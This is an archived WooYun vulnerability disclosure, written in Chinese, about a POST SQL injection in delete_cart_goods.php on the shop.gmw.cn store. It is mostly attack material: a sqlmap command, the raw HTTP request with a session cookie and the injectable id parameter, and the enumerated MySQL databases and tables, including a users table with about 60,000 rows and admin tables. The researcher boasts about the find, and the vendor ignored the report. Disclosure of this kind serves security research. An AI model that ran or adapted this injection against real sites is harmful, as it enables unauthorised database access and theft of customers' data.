乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-03: 细节已通知厂商并且等待厂商处理中 2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开
rT 厂商评分没超过10分的 让我来破处吧
post注入:sqlmap.py -r 1.txt --dbs---------------------数据包---------------------- 注入参数idPOST /delete_cart_goods.php HTTP/1.1Host: shop.gmw.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: ECS_ID=df6861b8e51456e4b62eb77981c2acc21162ba5c; ECS[visit_times]=1Connection: keep-aliveCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 4id=1
数据库
back-end DBMS: MySQL 5.0available databases [2]:[*] ecshop[*] information_schema
表信息
Database: ecshop+--------------------+---------+| Table | Entries |+--------------------+---------+| ecs_stats | 4829513 || ecs_users | 60469 || ecs_goods_attr | 45934 || ecs_keywords | 9852 || ecs_goods_gallery | 6632 || ecs_goods | 6407 || ecs_admin_log | 5005 || ecs_ddbook | 3983 || ecs_region | 3408 || ecs_searchengine | 1638 || ecs_order_goods | 1192 || ecs_jdhongwenge | 819 || ecs_sessions_data | 660 || ecs_order_action | 565 || ecs_sessions | 468 || ecs_pay_log | 377 || ecs_order_info | 336 || ecs_article | 218 || ecs_attribute | 210 || ecs_user_address | 201 || ecs_shop_config | 177 || ecs_delivery_goods | 175 || ecs_goods_article | 147 || ecs_admin_action | 109 || ecs_goods_cat | 92 || ecs_adsense | 57 || ecs_category | 56 || ecs_delivery_order | 56 || ecs_account_log | 46 || ecs_collect_goods | 40 || ecs_template | 38 || ecs_ad_position | 33 || ecs_ad | 32 || ecs_cid_book | 21 || ecs_nav | 21 || ecs_email_sendlist | 20 || ecs_cat_recommend | 17 || ecs_article_cat | 14 || ecs_mail_templates | 14 || ecs_goods_type | 13 || ecs_email_list | 11 || ecs_exchange_goods | 11 || ecs_suppliers | 9 || ecs_feedback | 7 || ecs_friend_link | 7 || ecs_reg_fields | 6 || ecs_volume_price | 6 || ecs_content_key | 5 || ecs_payment | 5 || ecs_bonus_type | 4 || ecs_comment | 3 || ecs_user_rank | 3 || ecs_vote_option | 3 || ecs_admin_user | 2 || ecs_area_region | 2 || ecs_shipping | 2 || ecs_shipping_area | 2 || ecs_user_account | 2 || ecs_role | 1 || ecs_vote | 1 |+--------------------+---------+
数据就不跑啦
嘿嘿
危害等级:无影响厂商忽略
忽略时间:2016-05-09 09:00
漏洞Rank:4 (WooYun评价)
暂无